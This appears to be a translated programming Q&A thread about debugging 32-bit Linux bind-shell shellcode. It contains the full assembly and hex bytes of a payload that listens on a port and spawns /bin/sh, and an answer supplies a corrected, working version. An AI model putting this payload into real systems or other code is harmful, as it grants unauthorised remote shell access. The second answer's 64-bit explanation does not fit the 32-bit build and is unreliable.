我正在为32位系统开发tcp-bind shellcode。代码位于32位ubuntu上,主机操作系统是64位Windows 10(他们甚至可以制作32位Windows 10吗?)
shellcode是一个tcp-bind。它作为自己的独立可执行文件执行正常,但是当代码转换为十六进制并被放入c测试程序时,存在分段错误。这甚至在使用时也会发生 gcc -m32 -fno-stack-protector -z execstack
这是shellcode反汇编的
global _start
section .text
_start:
xor edi, edi
; Socket Call
mov al, 0x66 ;SysSocket syscall
mov bl, 1 ; Socket call
push edi ; INADDR_ANY
push 1 ; SOCK_STREAM
push 2 ; AF_INET
mov ecx, esp ; long *args
int 0x80
;Bind
mov edx, eax ; reurn of Socket call is sockfd, place into edi
mov al, 0x66 ; SysSocket syscall
inc bl ; Bind call
push edi; INADDR_ANY
push word 0x3582; Port Number
push word 2 ; AF_INET
mov ecx, esp
push 16 ;addrlen
push ecx ;*sockaddr
push edx ;SockFD
mov ecx, esp
int 0x80
;Listen
mov al, 0x66
add bl, 2
push edi
push edx
mov ecx, esp
int 0x80
;Accept
mov al, 0x66
inc bl
push edi
push edi;
push edx
mov ecx, esp
int 0x80
;ready for dup2
xchg ebx, eax
xor ecx, ecx
mov cl, 2
loop:
mov al, 63
int 0x80
dec ecx
cmp ecx, edi
jge loop
; PUSH the first null dword
push edi
; PUSH //bin/sh (8 bytes)
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push edi
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
这是C代码:
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xff\xb0\x66\xb3\x01\x57\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc2
\xb0\x66\xfe\xc3\x57\x66\x68\x82\x35\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52
\x89\xe1\xcd\x80\xb0\x66\x80\xc3\x02\x57\x52\x89\xe1\xcd\x80\xb0\x66\xfe
\xc3\x57\\x57\x52\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80
\x49\x39\xf9\\x7d\xf7\x57\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x57\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
任何有助于弄清楚我何时无法在C中执行以及如何修复的帮助都非常感谢。谢谢!
对于那些希望使用此代码的人,我不承担任何责任。
答案 0 :(得分:1)
您发布的代码存在问题。使用换行符拆分行不应该真正编译。我不确定你是否在问题中插入换行符以便于阅读,而且原始文件在所有一行上都定义了字符串。在几个地方有一个无关的\。有\\x57 \x57和\\x7d应为\x7d。
它应该看起来像:
unsigned char code[] = \
"\x31\xff\xb0\x66\xb3\x01\x57\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc2"
"\xb0\x66\xfe\xc3\x57\x66\x68\x82\x35\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52"
"\x89\xe1\xcd\x80\xb0\x66\x80\xc3\x02\x57\x52\x89\xe1\xcd\x80\xb0\x66\xfe"
"\xc3\x57\x57\x52\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80"
"\x49\x39\xf9\x7d\xf7\x57\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x57\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
上面的字符串将每一行放在它自己的双引号之间,因此在解析时它们会被编译器连接起来。
您的汇编代码可能很幸运,它根本就是一个独立的应用程序。在另一个程序内部,寄存器可能不会为零。您的代码执行此操作:
xor edi, edi
; Socket Call
mov al, 0x66 ;SysSocket syscall
mov bl, 1 ; Socket call
您将整个 EDI 寄存器归零,但您的代码依赖于 EAX 的高位和 EBX 为零,这可能不是案件。你应该把这两个都归零:
xor edi, edi
xor eax, eax
xor ebx, ebx
; Socket Call
mov al, 0x66 ;SysSocket syscall
mov bl, 1 ; Socket call
添加两条额外的指令使寄存器归零会使字符串看起来像:
unsigned char code[] = \
"\x31\xff\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x57\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc2"
"\xb0\x66\xfe\xc3\x57\x66\x68\x82\x35\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52"
"\x89\xe1\xcd\x80\xb0\x66\x80\xc3\x02\x57\x52\x89\xe1\xcd\x80\xb0\x66\xfe"
"\xc3\x57\x57\x52\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80"
"\x49\x39\xf9\x7d\xf7\x57\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x57\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
OBJDUMP 是一个有用的工具。它可以从可执行文件中解析代码和数据(在这种情况下,您的 C 代码)。您可以使用此输出来确认字符串是否具有您期望的指令。 objdump -D -Mintel progname其中progname是可执行文件的名称。 -Mintel使用英特尔语法而不是AT&amp; T来反汇编代码和数据。从您的角色数组code生成的输出如下所示:
08049780 <code>:
8049780: 31 ff xor edi,edi
8049782: 31 c0 xor eax,eax
8049784: 31 db xor ebx,ebx
8049786: b0 66 mov al,0x66
8049788: b3 01 mov bl,0x1
804978a: 57 push edi
804978b: 6a 01 push 0x1
804978d: 6a 02 push 0x2
804978f: 89 e1 mov ecx,esp
8049791: cd 80 int 0x80
8049793: 89 c2 mov edx,eax
8049795: b0 66 mov al,0x66
8049797: fe c3 inc bl
8049799: 57 push edi
804979a: 66 68 82 35 pushw 0x3582
804979e: 66 6a 02 pushw 0x2
80497a1: 89 e1 mov ecx,esp
80497a3: 6a 10 push 0x10
80497a5: 51 push ecx
80497a6: 52 push edx
80497a7: 89 e1 mov ecx,esp
80497a9: cd 80 int 0x80
80497ab: b0 66 mov al,0x66
80497ad: 80 c3 02 add bl,0x2
80497b0: 57 push edi
80497b1: 52 push edx
80497b2: 89 e1 mov ecx,esp
80497b4: cd 80 int 0x80
80497b6: b0 66 mov al,0x66
80497b8: fe c3 inc bl
80497ba: 57 push edi
80497bb: 57 push edi
80497bc: 52 push edx
80497bd: 89 e1 mov ecx,esp
80497bf: cd 80 int 0x80
80497c1: 93 xchg ebx,eax
80497c2: 31 c9 xor ecx,ecx
80497c4: b1 02 mov cl,0x2
80497c6: b0 3f mov al,0x3f
80497c8: cd 80 int 0x80
80497ca: 49 dec ecx
80497cb: 39 f9 cmp ecx,edi
80497cd: 7d f7 jge 80497c6 <code+0x46>
80497cf: 57 push edi
80497d0: 68 2f 2f 73 68 push 0x68732f2f
80497d5: 68 2f 62 69 6e push 0x6e69622f
80497da: 89 e3 mov ebx,esp
80497dc: 57 push edi
80497dd: 89 e2 mov edx,esp
80497df: 53 push ebx
80497e0: 89 e1 mov ecx,esp
80497e2: b0 0b mov al,0xb
80497e4: cd 80 int 0x80
答案 1 :(得分:0)
IA-32和IA-32e模式彼此略有不同。仍支持int 0x80,但使用系统调用的优先方法是通过SYSCALL指令。在IA-32模式下,必须将所有参数推送到堆栈。在IA-32e中,寄存器RDI,RSI,RDX,R8-R10用于参数。如果你有超过6个参数,那么你必须将它们推送到堆栈(QWORD对齐!)...使用SYSCALL指令,结果RFLAGS在R11寄存器中返回。
在IA-32e模式下无法在堆栈上推送32位寄存器(尝试在代码的开头添加“位64”并再次组装)。从你的32位代码,“push edi”将被解释为“push rdi”...
问题可能是“dec ecx”指令。在IA-32模式下是0x49,但IA-32e是0xFF 0xC9。当然,你的代码是处理32位ESP,而不是RSP ......